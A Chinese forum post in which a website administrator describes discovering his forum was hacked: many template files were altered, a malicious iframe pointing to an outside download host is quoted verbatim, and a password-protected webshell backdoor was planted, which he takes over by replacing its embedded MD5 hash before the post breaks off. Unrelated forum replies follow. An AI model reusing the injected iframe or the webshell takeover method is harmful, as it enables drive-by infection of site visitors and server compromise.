|
|
6月6日早上8点10分左右,我像往常一样,一到公司就马上打开傲游浏览器登陆我们的网站(傲游浏览器可以打开上一次关闭时所浏览的页面的),倒杯水回来却发现浏览器死火了,这时候还没能引起我的注意,毕竟浏览器死火也没什么希奇的,于是强行关闭浏览器的进程,再重新打开(采用打开上一次浏览的页面的方式),TMD居然又死火了,莫非是因为我装的几个新软件跟浏览器不兼容引起的??于是我马上删除了我昨天晚上安装的几个软件,再打开,还是不行,死火依旧,奇怪了,再一次重新打开浏览器,这次我没采用打开上一次浏览的页面这种方式来打开浏览器,输入17173地址,没事,浏览器没死,再输入163地址,OK,也没死,于是再输入我们网站的地址,页面打开了.,几秒后浏览器就死火了,在浏览器的下方的状态栏显示在我们的当面页面上正在打开一个不是属于我们的地址的页面,我觉得有点不对头了,这个地址不是我们的啊,也不是友情连接里面的连接地址啊,这时候就想到了莫非网站模板被人修改了?但是现在无法登陆普通页面,不知道实际是什么情况,没办法,只好直接登陆后台在线查看模板文件,幸好论坛有一个功能,就是能够对论坛现在的文件跟正常的文件进行对比,可以检测出是否有修改或者删除,添加等情况,鼠标轻轻一点,数秒后,结果出来了,我草,20多个文件被修改过了,还多了5个新的未知的文件(其中有几个是我自己修改的,我知道的),一看日期,是今天早上7.23分到7.24分这一分钟内被修改的,刻不容缓,马上查看被修改的文件,看看是那里出了问题了,很快就发现多了一段嵌入代码,不用多想,这个就是问题的根本了,这段代码绝对不应该出现在这里的,下面就是这段被嵌入的代码- <iframe src="http://downs12.tygzs.cn/mmchn/scsc.htm" width="50" height="0" frameborder="0"></iframe>
% B. D b2 L' @8 F$ c# p0 @经过一段时间的忙碌,确认所加的嵌入代码已经被清除完毕了,终于有时间静下来想一想了,能在一到两分钟的时间里,能在数十个文件里加入嵌入代码,如果是利用FTP是绝对不可能的,所以就排除了FTP帐号和密码泄露的情况,利用网站管理员的身份修改模板??本来这一点是最有可能的,但是很快也被我否定了,因为根据后台登陆的记录,这段时间以来就只有我一个人登陆过后台,而且根据后台的活动记录,我这个ID也不可能存在被人盗取的情况,最重要的一点,有些被加入了嵌入代码的文件是在网站管理后台根本无法加入的,所以这个利用管理员身份在网站后台修改模板的可能性也被我否决了,莫非利用远程溢出漏洞??于是我马上查找这10天来论坛所有新注册的用户,并且把所发的贴全都查看了一遍,又是一翻忙碌以后仍是没什么发现,这时候突然想起来对比校验文件的时候多出的几个文件,不知道是什么来的,输入地址打开一看,只有一个简单的密码登陆窗口,尝试输入一些常见的密码仍无法登陆,凭经验和直觉,我知道,这肯定是一个木马后门,立马把几个木马后门的文件下传到自己的电脑上,并且为了防止被人再次利用,马上在服务器删除了这几个木马后门文件,发现了新大陆当然不会放过了,于是马上在自己的电脑上研究起这个木马后门,第一部就是破解这个木马后门的登陆密码,通过代码分析和网上的相关资料查询(关于这个木马后门的资料真TMD的少),这个木马的密码是采用MD5加密的,白痴才会去直接破解MD5加密的东西,估计到我老死的哪一天也破解不了(注:事实上MD5加密的东西基本上也是不可逆转的),这个木马后门有一个地方没做好,就是代码没加密,这点对于已经获得了木马后门的文件的人来说那就轻松多了,虽然木马后门的密码是采用MD5加密的,但是MD5码是包含在了木马后门的文件的代码里的,只要代码没加密,哪就好办多了,直接用一段我自己搞的,也同样是用MD5加密了的密码把原来的木马后门的MD5密码给替换了就可以了.
, B! L+ y6 J D9 d. hOK,把这些已经受我控制了的木马后门程序再传到服务器上,我倒要看看这个木马后门有什么强大的功能,输入密码,顺利登陆..... |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
|
IP卡
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
看不清那图上的字.好模糊哦.
那是远程协助~开了QQ就行~我也会~
傻妮子现在也在哈~不去开店跑来论坛闲逛~